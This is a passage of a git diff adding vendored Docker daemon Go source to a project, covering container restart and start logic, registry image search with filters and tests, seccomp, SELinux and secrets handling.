+	}
+	if seconds == nil {
+		stopTimeout := container.StopTimeout()
+		seconds = &stopTimeout
+	}
+	if err := daemon.containerRestart(container, *seconds); err != nil {
+		return fmt.Errorf("Cannot restart container %s: %v", name, err)
+	}
+	return nil
+
+}
+
+// containerRestart attempts to gracefully stop and then start the
+// container. When stopping, wait for the given duration in seconds to
+// gracefully stop, before forcefully terminating the container. If
+// given a negative duration, wait forever for a graceful stop.
+func (daemon *Daemon) containerRestart(container *container.Container, seconds int) error {
+	// Avoid unnecessarily unmounting and then directly mounting
+	// the container when the container stops and then starts
+	// again
+	if err := daemon.Mount(container); err == nil {
+		defer daemon.Unmount(container)
+	}
+
+	if container.IsRunning() {
+		// set AutoRemove flag to false before stop so the container won't be
+		// removed during restart process
+		autoRemove := container.HostConfig.AutoRemove
+
+		container.HostConfig.AutoRemove = false
+		err := daemon.containerStop(container, seconds)
+		// restore AutoRemove irrespective of whether the stop worked or not
+		container.HostConfig.AutoRemove = autoRemove
+		// containerStop will write HostConfig to disk, we shall restore AutoRemove
+		// in disk too
+		if toDiskErr := container.ToDiskLocking(); toDiskErr != nil {
+			logrus.Errorf("Write container to disk error: %v", toDiskErr)
+		}
+
+		if err != nil {
+			return err
+		}
+	}
+
+	if err := daemon.containerStart(container, "", "", true); err != nil {
+		return err
+	}
+
+	daemon.LogContainerEvent(container, "restart")
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/search.go b/vendor/github.com/docker/docker/daemon/search.go
new file mode 100644
index 0000000000..5d2ac5d222
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/search.go
@@ -0,0 +1,94 @@
+package daemon
+
+import (
+	"fmt"
+	"strconv"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	registrytypes "github.com/docker/docker/api/types/registry"
+	"github.com/docker/docker/dockerversion"
+)
+
+var acceptedSearchFilterTags = map[string]bool{
+	"is-automated": true,
+	"is-official":  true,
+	"stars":        true,
+}
+
+// SearchRegistryForImages queries the registry for images matching
+// term. authConfig is used to login.
+func (daemon *Daemon) SearchRegistryForImages(ctx context.Context, filtersArgs string, term string, limit int,
+	authConfig *types.AuthConfig,
+	headers map[string][]string) (*registrytypes.SearchResults, error) {
+
+	searchFilters, err := filters.FromParam(filtersArgs)
+	if err != nil {
+		return nil, err
+	}
+	if err := searchFilters.Validate(acceptedSearchFilterTags); err != nil {
+		return nil, err
+	}
+
+	var isAutomated, isOfficial bool
+	var hasStarFilter = 0
+	if searchFilters.Include("is-automated") {
+		if searchFilters.UniqueExactMatch("is-automated", "true") {
+			isAutomated = true
+		} else if !searchFilters.UniqueExactMatch("is-automated", "false") {
+			return nil, fmt.Errorf("Invalid filter 'is-automated=%s'", searchFilters.Get("is-automated"))
+		}
+	}
+	if searchFilters.Include("is-official") {
+		if searchFilters.UniqueExactMatch("is-official", "true") {
+			isOfficial = true
+		} else if !searchFilters.UniqueExactMatch("is-official", "false") {
+			return nil, fmt.Errorf("Invalid filter 'is-official=%s'", searchFilters.Get("is-official"))
+		}
+	}
+	if searchFilters.Include("stars") {
+		hasStars := searchFilters.Get("stars")
+		for _, hasStar := range hasStars {
+			iHasStar, err := strconv.Atoi(hasStar)
+			if err != nil {
+				return nil, fmt.Errorf("Invalid filter 'stars=%s'", hasStar)
+			}
+			if iHasStar > hasStarFilter {
+				hasStarFilter = iHasStar
+			}
+		}
+	}
+
+	unfilteredResult, err := daemon.RegistryService.Search(ctx, term, limit, authConfig, dockerversion.DockerUserAgent(ctx), headers)
+	if err != nil {
+		return nil, err
+	}
+
+	filteredResults := []registrytypes.SearchResult{}
+	for _, result := range unfilteredResult.Results {
+		if searchFilters.Include("is-automated") {
+			if isAutomated != result.IsAutomated {
+				continue
+			}
+		}
+		if searchFilters.Include("is-official") {
+			if isOfficial != result.IsOfficial {
+				continue
+			}
+		}
+		if searchFilters.Include("stars") {
+			if result.StarCount < hasStarFilter {
+				continue
+			}
+		}
+		filteredResults = append(filteredResults, result)
+	}
+
+	return &registrytypes.SearchResults{
+		Query:      unfilteredResult.Query,
+		NumResults: len(filteredResults),
+		Results:    filteredResults,
+	}, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/search_test.go b/vendor/github.com/docker/docker/daemon/search_test.go
new file mode 100644
index 0000000000..f5aa85a61e
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/search_test.go
@@ -0,0 +1,358 @@
+package daemon
+
+import (
+	"fmt"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	registrytypes "github.com/docker/docker/api/types/registry"
+	"github.com/docker/docker/registry"
+)
+
+type FakeService struct {
+	registry.DefaultService
+
+	shouldReturnError bool
+
+	term    string
+	results []registrytypes.SearchResult
+}
+
+func (s *FakeService) Search(ctx context.Context, term string, limit int, authConfig *types.AuthConfig, userAgent string, headers map[string][]string) (*registrytypes.SearchResults, error) {
+	if s.shouldReturnError {
+		return nil, fmt.Errorf("Search unknown error")
+	}
+	return &registrytypes.SearchResults{
+		Query:      s.term,
+		NumResults: len(s.results),
+		Results:    s.results,
+	}, nil
+}
+
+func TestSearchRegistryForImagesErrors(t *testing.T) {
+	errorCases := []struct {
+		filtersArgs       string
+		shouldReturnError bool
+		expectedError     string
+	}{
+		{
+			expectedError:     "Search unknown error",
+			shouldReturnError: true,
+		},
+		{
+			filtersArgs:   "invalid json",
+			expectedError: "invalid character 'i' looking for beginning of value",
+		},
+		{
+			filtersArgs:   `{"type":{"custom":true}}`,
+			expectedError: "Invalid filter 'type'",
+		},
+		{
+			filtersArgs:   `{"is-automated":{"invalid":true}}`,
+			expectedError: "Invalid filter 'is-automated=[invalid]'",
+		},
+		{
+			filtersArgs:   `{"is-automated":{"true":true,"false":true}}`,
+			expectedError: "Invalid filter 'is-automated",
+		},
+		{
+			filtersArgs:   `{"is-official":{"invalid":true}}`,
+			expectedError: "Invalid filter 'is-official=[invalid]'",
+		},
+		{
+			filtersArgs:   `{"is-official":{"true":true,"false":true}}`,
+			expectedError: "Invalid filter 'is-official",
+		},
+		{
+			filtersArgs:   `{"stars":{"invalid":true}}`,
+			expectedError: "Invalid filter 'stars=invalid'",
+		},
+		{
+			filtersArgs:   `{"stars":{"1":true,"invalid":true}}`,
+			expectedError: "Invalid filter 'stars=invalid'",
+		},
+	}
+	for index, e := range errorCases {
+		daemon := &Daemon{
+			RegistryService: &FakeService{
+				shouldReturnError: e.shouldReturnError,
+			},
+		}
+		_, err := daemon.SearchRegistryForImages(context.Background(), e.filtersArgs, "term", 25, nil, map[string][]string{})
+		if err == nil {
+			t.Errorf("%d: expected an error, got nothing", index)
+		}
+		if !strings.Contains(err.Error(), e.expectedError) {
+			t.Errorf("%d: expected error to contain %s, got %s", index, e.expectedError, err.Error())
+		}
+	}
+}
+
+func TestSearchRegistryForImages(t *testing.T) {
+	term := "term"
+	successCases := []struct {
+		filtersArgs     string
+		registryResults []registrytypes.SearchResult
+		expectedResults []registrytypes.SearchResult
+	}{
+		{
+			filtersArgs:     "",
+			registryResults: []registrytypes.SearchResult{},
+			expectedResults: []registrytypes.SearchResult{},
+		},
+		{
+			filtersArgs: "",
+			registryResults: []registrytypes.SearchResult{
+				{
+					Name:        "name",
+					Description: "description",
+				},
+			},
+			expectedResults: []registrytypes.SearchResult{
+				{
+					Name:        "name",
+					Description: "description",
+				},
+			},
+		},
+		{
+			filtersArgs: `{"is-automated":{"true":true}}`,
+			registryResults: []registrytypes.SearchResult{
+				{
+					Name:        "name",
+					Description: "description",
+				},
+			},
+			expectedResults: []registrytypes.SearchResult{},
+		},
+		{
+			filtersArgs: `{"is-automated":{"true":true}}`,
+			registryResults: []registrytypes.SearchResult{
+				{
+					Name:        "name",
+					Description: "description",
+					IsAutomated: true,
+				},
+			},
+			expectedResults: []registrytypes.SearchResult{
+				{
+					Name:        "name",
+					Description: "description",
+					IsAutomated: true,
+				},
+			},
+		},
+		{
+			filtersArgs: `{"is-automated":{"false":true}}`,
+			registryResults: []registrytypes.SearchResult{
+				{
+					Name:        "name",
+					Description: "description",
+					IsAutomated: true,
+				},
+			},
+			expectedResults: []registrytypes.SearchResult{},
+		},
+		{
+			filtersArgs: `{"is-automated":{"false":true}}`,
+			registryResults: []registrytypes.SearchResult{
+				{
+					Name:        "name",
+					Description: "description",
+					IsAutomated: false,
+				},
+			},
+			expectedResults: []registrytypes.SearchResult{
+				{
+					Name:        "name",
+					Description: "description",
+					IsAutomated: false,
+				},
+			},
+		},
+		{
+			filtersArgs: `{"is-official":{"true":true}}`,
+			registryResults: []registrytypes.SearchResult{
+				{
+					Name:        "name",
+					Description: "description",
+				},
+			},
+			expectedResults: []registrytypes.SearchResult{},
+		},
+		{
+			filtersArgs: `{"is-official":{"true":true}}`,
+			registryResults: []registrytypes.SearchResult{
+				{
+					Name:        "name",
+					Description: "description",
+					IsOfficial:  true,
+				},
+			},
+			expectedResults: []registrytypes.SearchResult{
+				{
+					Name:        "name",
+					Description: "description",
+					IsOfficial:  true,
+				},
+			},
+		},
+		{
+			filtersArgs: `{"is-official":{"false":true}}`,
+			registryResults: []registrytypes.SearchResult{
+				{
+					Name:        "name",
+					Description: "description",
+					IsOfficial:  true,
+				},
+			},
+			expectedResults: []registrytypes.SearchResult{},
+		},
+		{
+			filtersArgs: `{"is-official":{"false":true}}`,
+			registryResults: []registrytypes.SearchResult{
+				{
+					Name:        "name",
+					Description: "description",
+					IsOfficial:  false,
+				},
+			},
+			expectedResults: []registrytypes.SearchResult{
+				{
+					Name:        "name",
+					Description: "description",
+					IsOfficial:  false,
+				},
+			},
+		},
+		{
+			filtersArgs: `{"stars":{"0":true}}`,
+			registryResults: []registrytypes.SearchResult{
+				{
+					Name:        "name",
+					Description: "description",
+					StarCount:   0,
+				},
+			},
+			expectedResults: []registrytypes.SearchResult{
+				{
+					Name:        "name",
+					Description: "description",
+					StarCount:   0,
+				},
+			},
+		},
+		{
+			filtersArgs: `{"stars":{"1":true}}`,
+			registryResults: []registrytypes.SearchResult{
+				{
+					Name:        "name",
+					Description: "description",
+					StarCount:   0,
+				},
+			},
+			expectedResults: []registrytypes.SearchResult{},
+		},
+		{
+			filtersArgs: `{"stars":{"1":true}}`,
+			registryResults: []registrytypes.SearchResult{
+				{
+					Name:        "name0",
+					Description: "description0",
+					StarCount:   0,
+				},
+				{
+					Name:        "name1",
+					Description: "description1",
+					StarCount:   1,
+				},
+			},
+			expectedResults: []registrytypes.SearchResult{
+				{
+					Name:        "name1",
+					Description: "description1",
+					StarCount:   1,
+				},
+			},
+		},
+		{
+			filtersArgs: `{"stars":{"1":true}, "is-official":{"true":true}, "is-automated":{"true":true}}`,
+			registryResults: []registrytypes.SearchResult{
+				{
+					Name:        "name0",
+					Description: "description0",
+					StarCount:   0,
+					IsOfficial:  true,
+					IsAutomated: true,
+				},
+				{
+					Name:        "name1",
+					Description: "description1",
+					StarCount:   1,
+					IsOfficial:  false,
+					IsAutomated: true,
+				},
+				{
+					Name:        "name2",
+					Description: "description2",
+					StarCount:   1,
+					IsOfficial:  true,
+					IsAutomated: false,
+				},
+				{
+					Name:        "name3",
+					Description: "description3",
+					StarCount:   2,
+					IsOfficial:  true,
+					IsAutomated: true,
+				},
+			},
+			expectedResults: []registrytypes.SearchResult{
+				{
+					Name:        "name3",
+					Description: "description3",
+					StarCount:   2,
+					IsOfficial:  true,
+					IsAutomated: true,
+				},
+			},
+		},
+	}
+	for index, s := range successCases {
+		daemon := &Daemon{
+			RegistryService: &FakeService{
+				term:    term,
+				results: s.registryResults,
+			},
+		}
+		results, err := daemon.SearchRegistryForImages(context.Background(), s.filtersArgs, term, 25, nil, map[string][]string{})
+		if err != nil {
+			t.Errorf("%d: %v", index, err)
+		}
+		if results.Query != term {
+			t.Errorf("%d: expected Query to be %s, got %s", index, term, results.Query)
+		}
+		if results.NumResults != len(s.expectedResults) {
+			t.Errorf("%d: expected NumResults to be %d, got %d", index, len(s.expectedResults), results.NumResults)
+		}
+		for _, result := range results.Results {
+			found := false
+			for _, expectedResult := range s.expectedResults {
+				if expectedResult.Name == result.Name &&
+					expectedResult.Description == result.Description &&
+					expectedResult.IsAutomated == result.IsAutomated &&
+					expectedResult.IsOfficial == result.IsOfficial &&
+					expectedResult.StarCount == result.StarCount {
+					found = true
+					break
+				}
+			}
+			if !found {
+				t.Errorf("%d: expected results %v, got %v", index, s.expectedResults, results.Results)
+			}
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/seccomp_disabled.go b/vendor/github.com/docker/docker/daemon/seccomp_disabled.go
new file mode 100644
index 0000000000..ff1127b6c2
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/seccomp_disabled.go
@@ -0,0 +1,19 @@
+// +build linux,!seccomp
+
+package daemon
+
+import (
+	"fmt"
+
+	"github.com/docker/docker/container"
+	"github.com/opencontainers/runtime-spec/specs-go"
+)
+
+var supportsSeccomp = false
+
+func setSeccomp(daemon *Daemon, rs *specs.Spec, c *container.Container) error {
+	if c.SeccompProfile != "" && c.SeccompProfile != "unconfined" {
+		return fmt.Errorf("seccomp profiles are not supported on this daemon, you cannot specify a custom seccomp profile")
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/seccomp_linux.go b/vendor/github.com/docker/docker/daemon/seccomp_linux.go
new file mode 100644
index 0000000000..7f16733d95
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/seccomp_linux.go
@@ -0,0 +1,55 @@
+// +build linux,seccomp
+
+package daemon
+
+import (
+	"fmt"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/profiles/seccomp"
+	"github.com/opencontainers/runtime-spec/specs-go"
+)
+
+var supportsSeccomp = true
+
+func setSeccomp(daemon *Daemon, rs *specs.Spec, c *container.Container) error {
+	var profile *specs.Seccomp
+	var err error
+
+	if c.HostConfig.Privileged {
+		return nil
+	}
+
+	if !daemon.seccompEnabled {
+		if c.SeccompProfile != "" && c.SeccompProfile != "unconfined" {
+			return fmt.Errorf("Seccomp is not enabled in your kernel, cannot run a custom seccomp profile.")
+		}
+		logrus.Warn("Seccomp is not enabled in your kernel, running container without default profile.")
+		c.SeccompProfile = "unconfined"
+	}
+	if c.SeccompProfile == "unconfined" {
+		return nil
+	}
+	if c.SeccompProfile != "" {
+		profile, err = seccomp.LoadProfile(c.SeccompProfile, rs)
+		if err != nil {
+			return err
+		}
+	} else {
+		if daemon.seccompProfile != nil {
+			profile, err = seccomp.LoadProfile(string(daemon.seccompProfile), rs)
+			if err != nil {
+				return err
+			}
+		} else {
+			profile, err = seccomp.GetDefaultProfile(rs)
+			if err != nil {
+				return err
+			}
+		}
+	}
+
+	rs.Linux.Seccomp = profile
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/seccomp_unsupported.go b/vendor/github.com/docker/docker/daemon/seccomp_unsupported.go
new file mode 100644
index 0000000000..b3691e96af
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/seccomp_unsupported.go
@@ -0,0 +1,5 @@
+// +build !linux
+
+package daemon
+
+var supportsSeccomp = false
diff --git a/vendor/github.com/docker/docker/daemon/secrets.go b/vendor/github.com/docker/docker/daemon/secrets.go
new file mode 100644
index 0000000000..355cb1e139
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/secrets.go
@@ -0,0 +1,36 @@
+package daemon
+
+import (
+	"github.com/Sirupsen/logrus"
+	swarmtypes "github.com/docker/docker/api/types/swarm"
+	"github.com/docker/swarmkit/agent/exec"
+)
+
+// SetContainerSecretStore sets the secret store backend for the container
+func (daemon *Daemon) SetContainerSecretStore(name string, store exec.SecretGetter) error {
+	c, err := daemon.GetContainer(name)
+	if err != nil {
+		return err
+	}
+
+	c.SecretStore = store
+
+	return nil
+}
+
+// SetContainerSecretReferences sets the container secret references needed
+func (daemon *Daemon) SetContainerSecretReferences(name string, refs []*swarmtypes.SecretReference) error {
+	if !secretsSupported() && len(refs) > 0 {
+		logrus.Warn("secrets are not supported on this platform")
+		return nil
+	}
+
+	c, err := daemon.GetContainer(name)
+	if err != nil {
+		return err
+	}
+
+	c.SecretReferences = refs
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/secrets_linux.go b/vendor/github.com/docker/docker/daemon/secrets_linux.go
new file mode 100644
index 0000000000..fca4e12598
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/secrets_linux.go
@@ -0,0 +1,7 @@
+// +build linux
+
+package daemon
+
+func secretsSupported() bool {
+	return true
+}
diff --git a/vendor/github.com/docker/docker/daemon/secrets_unsupported.go b/vendor/github.com/docker/docker/daemon/secrets_unsupported.go
new file mode 100644
index 0000000000..d6f36fda1e
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/secrets_unsupported.go
@@ -0,0 +1,7 @@
+// +build !linux
+
+package daemon
+
+func secretsSupported() bool {
+	return false
+}
diff --git a/vendor/github.com/docker/docker/daemon/selinux_linux.go b/vendor/github.com/docker/docker/daemon/selinux_linux.go
new file mode 100644
index 0000000000..83a3447111
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/selinux_linux.go
@@ -0,0 +1,17 @@
+// +build linux
+
+package daemon
+
+import "github.com/opencontainers/runc/libcontainer/selinux"
+
+func selinuxSetDisabled() {
+	selinux.SetDisabled()
+}
+
+func selinuxFreeLxcContexts(label string) {
+	selinux.FreeLxcContexts(label)
+}
+
+func selinuxEnabled() bool {
+	return selinux.SelinuxEnabled()
+}
diff --git a/vendor/github.com/docker/docker/daemon/selinux_unsupported.go b/vendor/github.com/docker/docker/daemon/selinux_unsupported.go
new file mode 100644
index 0000000000..25a56ad157
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/selinux_unsupported.go
@@ -0,0 +1,13 @@
+// +build !linux
+
+package daemon
+
+func selinuxSetDisabled() {
+}
+
+func selinuxFreeLxcContexts(label string) {
+}
+
+func selinuxEnabled() bool {
+	return false
+}
diff --git a/vendor/github.com/docker/docker/daemon/start.go b/vendor/github.com/docker/docker/daemon/start.go
new file mode 100644
index 0000000000..6c94fd5482
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/start.go
@@ -0,0 +1,230 @@
+package daemon
+
+import (
+	"fmt"
+	"net/http"
+	"runtime"
+	"strings"
+	"syscall"
+	"time"
+
+	"google.golang.org/grpc"
+
+	"github.com/Sirupsen/logrus"
+	apierrors "github.com/docker/docker/api/errors"
+	"github.com/docker/docker/api/types"
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/runconfig"
+)
+
+// ContainerStart starts a container.
+func (daemon *Daemon) ContainerStart(name string, hostConfig *containertypes.HostConfig, checkpoint string, checkpointDir string) error {
+	if checkpoint != "" && !daemon.HasExperimental() {
+		return apierrors.NewBadRequestError(fmt.Errorf("checkpoint is only supported in experimental mode"))
+	}
+
+	container, err := daemon.GetContainer(name)
+	if err != nil {
+		return err
+	}
+
+	if container.IsPaused() {
+		return fmt.Errorf("Cannot start a paused container, try unpause instead.")
+	}
+
+	if container.IsRunning() {
+		err := fmt.Errorf("Container already started")
+		return apierrors.NewErrorWithStatusCode(err, http.StatusNotModified)
+	}
+
+	// Windows does not have the backwards compatibility issue here.
+	if runtime.GOOS != "windows" {
+		// This is kept for backward compatibility - hostconfig should be passed when
+		// creating a container, not during start.
+		if hostConfig != nil {
+			logrus.Warn("DEPRECATED: Setting host configuration options when the container starts is deprecated and has been removed in Docker 1.12")
+			oldNetworkMode := container.HostConfig.NetworkMode
+			if err := daemon.setSecurityOptions(container, hostConfig); err != nil {
+				return err
+			}
+			if err := daemon.mergeAndVerifyLogConfig(&hostConfig.LogConfig); err != nil {
+				return err
+			}
+			if err := daemon.setHostConfig(container, hostConfig); err != nil {
+				return err
+			}
+			newNetworkMode := container.HostConfig.NetworkMode
+			if string(oldNetworkMode) != string(newNetworkMode) {
+				// if user has change the network mode on starting, clean up the
+				// old networks. It is a deprecated feature and has been removed in Docker 1.12
+				container.NetworkSettings.Networks = nil
+				if err := container.ToDisk(); err != nil {
+					return err
+				}
+			}
+			container.InitDNSHostConfig()
+		}
+	} else {
+		if hostConfig != nil {
+			return fmt.Errorf("Supplying a hostconfig on start is not supported. It should be supplied on create")
+		}
+	}
+
+	// check if hostConfig is in line with the current system settings.
+	// It may happen cgroups are umounted or the like.
+	if _, err = daemon.verifyContainerSettings(container.HostConfig, nil, false); err != nil {
+		return err
+	}
+	// Adapt for old containers in case we have updates in this function and
+	// old containers never have chance to call the new function in create stage.
+	if hostConfig != nil {
+		if err := daemon.adaptContainerSettings(container.HostConfig, false); err != nil {
+			return err
+		}
+	}
+
+	return daemon.containerStart(container, checkpoint, checkpointDir, true)
+}
+
+// Start starts a container
+func (daemon *Daemon) Start(container *container.Container) error {
+	return daemon.containerStart(container, "", "", true)
+}
+
+// containerStart prepares the container to run by setting up everything the
+// container needs, such as storage and networking, as well as links
+// between containers. The container is left waiting for a signal to
+// begin running.
+func (daemon *Daemon) containerStart(container *container.Container, checkpoint string, checkpointDir string, resetRestartManager bool) (err error) {
+	start := time.Now()
+	container.Lock()
+	defer container.Unlock()
+
+	if resetRestartManager && container.Running { // skip this check if already in restarting step and resetRestartManager==false
+		return nil
+	}
+
+	if container.RemovalInProgress || container.Dead {
+		return fmt.Errorf("Container is marked for removal and cannot be started.")
+	}
+
+	// if we encounter an error during start we need to ensure that any other
+	// setup has been cleaned up properly
+	defer func() {
+		if err != nil {
+			container.SetError(err)
+			// if no one else has set it, make sure we don't leave it at zero
+			if container.ExitCode() == 0 {
+				container.SetExitCode(128)
+			}
+			container.ToDisk()
+
+			container.Reset(false)
+
+			daemon.Cleanup(container)
+			// if containers AutoRemove flag is set, remove it after clean up
+			if container.HostConfig.AutoRemove {
+				container.Unlock()
+				if err := daemon.ContainerRm(container.ID, &types.ContainerRmConfig{ForceRemove: true, RemoveVolume: true}); err != nil {
+					logrus.Errorf("can't remove container %s: %v", container.ID, err)
+				}
+				container.Lock()
+			}
+		}
+	}()
+
+	if err := daemon.conditionalMountOnStart(container); err != nil {
+		return err
+	}
+
+	// Make sure NetworkMode has an acceptable value. We do this to ensure
+	// backwards API compatibility.
+	container.HostConfig = runconfig.SetDefaultNetModeIfBlank(container.HostConfig)
+
+	if err := daemon.initializeNetworking(container); err != nil {
+		return err
+	}
+
+	spec, err := daemon.createSpec(container)
+	if err != nil {
+		return err
+	}
+
+	createOptions, err := daemon.getLibcontainerdCreateOptions(container)
+	if err != nil {
+		return err
+	}
+
+	if resetRestartManager {
+		container.ResetRestartManager(true)
+	}
+
+	if checkpointDir == "" {
+		checkpointDir = container.CheckpointDir()
+	}
+
+	if err := daemon.containerd.Create(container.ID, checkpoint, checkpointDir, *spec, container.InitializeStdio, createOptions...); err != nil {
+		errDesc := grpc.ErrorDesc(err)
+		contains := func(s1, s2 string) bool {
+			return strings.Contains(strings.ToLower(s1), s2)
+		}
+		logrus.Errorf("Create container failed with error: %s", errDesc)
+		// if we receive an internal error from the initial start of a container then lets
+		// return it instead of entering the restart loop
+		// set to 127 for container cmd not found/does not exist)
+		if contains(errDesc, container.Path) &&
+			(contains(errDesc, "executable file not found") ||
+				contains(errDesc, "no such file or directory") ||
+				contains(errDesc, "system cannot find the file specified")) {
+			container.SetExitCode(127)
+		}
+		// set to 126 for container cmd can't be invoked errors
+		if contains(errDesc, syscall.EACCES.Error()) {
+			container.SetExitCode(126)
+		}
+
+		// attempted to mount a file onto a directory, or a directory onto a file, maybe from user specified bind mounts
+		if contains(errDesc, syscall.ENOTDIR.Error()) {
+			errDesc += ": Are you trying to mount a directory onto a file (or vice-versa)? Check if the specified host path exists and is the expected type"
+			container.SetExitCode(127)
+		}
+
+		return fmt.Errorf("%s", errDesc)
+	}
+
+	containerActions.WithValues("start").UpdateSince(start)
+
+	return nil
+}
+
+// Cleanup releases any network resources allocated to the container along with any rules
+// around how containers are linked together.  It also unmounts the container's root filesystem.
+func (daemon *Daemon) Cleanup(container *container.Container) {
+	daemon.releaseNetwork(container)
+
+	container.UnmountIpcMounts(detachMounted)
+
+	if err := daemon.conditionalUnmountOnCleanup(container); err != nil {
+		// FIXME: remove once reference counting for graphdrivers has been refactored
+		// Ensure that all the mounts are gone
+		if mountid, err := daemon.layerStore.GetMountID(container.ID); err == nil {
+			daemon.cleanupMountsByID(mountid)
+		}
+	}
+
+	if err := container.UnmountSecrets(); err != nil {
+		logrus.Warnf("%s cleanup: failed to unmount secrets: %s", container.ID, err)
+	}
+
+	for _, eConfig := range container.ExecCommands.Commands() {
+		daemon.unregisterExecCommand(container, eConfig)
+	}
+
+	if container.BaseFS != "" {
+		if err := container.UnmountVolumes(daemon.LogVolumeEvent); err != nil {
+			logrus.Warnf("%s cleanup: Failed to umount volumes: %v", container.ID, err)
+		}
+	}
+	container.CancelAttachContext()
+}
diff --git a/vendor/github.com/docker/docker/daemon/start_unix.go b/vendor/github.com/docker/docker/daemon/start_unix.go
new file mode 100644
index 0000000000..6bbe485075
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/start_unix.go
@@ -0,0 +1,31 @@
+// +build !windows
+
+package daemon
+
+import (
+	"fmt"
+
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/libcontainerd"
+)
+
+func (daemon *Daemon) getLibcontainerdCreateOptions(container *container.Container) ([]libcontainerd.CreateOption, error) {
+	createOptions := []libcontainerd.CreateOption{}
+
+	// Ensure a runtime has been assigned to this container
+	if container.HostConfig.Runtime == "" {
+		container.HostConfig.Runtime = stockRuntimeName
+		container.ToDisk()
+	}
+
+	rt := daemon.configStore.GetRuntime(container.HostConfig.Runtime)
+	if rt == nil {
+		return nil, fmt.Errorf("no such runtime '%s'", container.HostConfig.Runtime)
+	}
+	if UsingSystemd(daemon.configStore) {
+		rt.Args = append(rt.Args, "--systemd-cgroup=true")
+	}
+	createOptions = append(createOptions, libcontainerd.WithRuntime(rt.Path, rt.Args))
+
+	return createOptions, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/start_windows.go b/vendor/github.com/docker/docker/daemon/start_windows.go
new file mode 100644
index 0000000000..faa7575224
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/start_windows.go
@@ -0,0 +1,205 @@
+package daemon
+
+import (
+	"fmt"
+	"io/ioutil"
+	"path/filepath"
+	"strings"
+
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/libcontainerd"
+	"golang.org/x/sys/windows/registry"
+)
+
+const (
+	credentialSpecRegistryLocation = `SOFTWARE\Microsoft\Windows NT\CurrentVersion\Virtualization\Containers\CredentialSpecs`
+	credentialSpecFileLocation     = "CredentialSpecs"
+)
+
+func (daemon *Daemon) getLibcontainerdCreateOptions(container *container.Container) ([]libcontainerd.CreateOption, error) {
+	createOptions := []libcontainerd.CreateOption{}
+
+	// Are we going to run as a Hyper-V container?
+	hvOpts := &libcontainerd.HyperVIsolationOption{}
+	if container.HostConfig.Isolation.IsDefault() {
+		// Container is set to use the default, so take the default from the daemon configuration
+		hvOpts.IsHyperV = daemon.defaultIsolation.IsHyperV()
+	} else {
+		// Container is requesting an isolation mode. Honour it.
+		hvOpts.IsHyperV = container.HostConfig.Isolation.IsHyperV()
+	}
+
+	// Generate the layer folder of the layer options
+	layerOpts := &libcontainerd.LayerOption{}
+	m, err := container.RWLayer.Metadata()
+	if err != nil {
+		return nil, fmt.Errorf("failed to get layer metadata - %s", err)
+	}
+	if hvOpts.IsHyperV {
+		hvOpts.SandboxPath = filepath.Dir(m["dir"])
+	}
+
+	layerOpts.LayerFolderPath = m["dir"]
+
+	// Generate the layer paths of the layer options
+	img, err := daemon.imageStore.Get(container.ImageID)
+	if err != nil {
+		return nil, fmt.Errorf("failed to graph.Get on ImageID %s - %s", container.ImageID, err)
+	}
+	// Get the layer path for each layer.
+	max := len(img.RootFS.DiffIDs)
+	for i := 1; i <= max; i++ {
+		img.RootFS.DiffIDs = img.RootFS.DiffIDs[:i]
+		layerPath, err := layer.GetLayerPath(daemon.layerStore, img.RootFS.ChainID())
+		if err != nil {
+			return nil, fmt.Errorf("failed to get layer path from graphdriver %s for ImageID %s - %s", daemon.layerStore, img.RootFS.ChainID(), err)
+		}
+		// Reverse order, expecting parent most first
+		layerOpts.LayerPaths = append([]string{layerPath}, layerOpts.LayerPaths...)
+	}
+
+	// Get endpoints for the libnetwork allocated networks to the container
+	var epList []string
+	AllowUnqualifiedDNSQuery := false
+	gwHNSID := ""
+	if container.NetworkSettings != nil {
+		for n := range container.NetworkSettings.Networks {
+			sn, err := daemon.FindNetwork(n)
+			if err != nil {
+				continue
+			}
+
+			ep, err := container.GetEndpointInNetwork(sn)
+			if err != nil {
+				continue
+			}
+
+			data, err := ep.DriverInfo()
+			if err != nil {
+				continue
+			}
+
+			if data["GW_INFO"] != nil {
+				gwInfo := data["GW_INFO"].(map[string]interface{})
+				if gwInfo["hnsid"] != nil {
+					gwHNSID = gwInfo["hnsid"].(string)
+				}
+			}
+
+			if data["hnsid"] != nil {
+				epList = append(epList, data["hnsid"].(string))
+			}
+
+			if data["AllowUnqualifiedDNSQuery"] != nil {
+				AllowUnqualifiedDNSQuery = true
+			}
+		}
+	}
+
+	if gwHNSID != "" {
+		epList = append(epList, gwHNSID)
+	}
+
+	// Read and add credentials from the security options if a credential spec has been provided.
+	if container.HostConfig.SecurityOpt != nil {
+		for _, sOpt := range container.HostConfig.SecurityOpt {
+			sOpt = strings.ToLower(sOpt)
+			if !strings.Contains(sOpt, "=") {
+				return nil, fmt.Errorf("invalid security option: no equals sign in supplied value %s", sOpt)
+			}
+			var splitsOpt []string
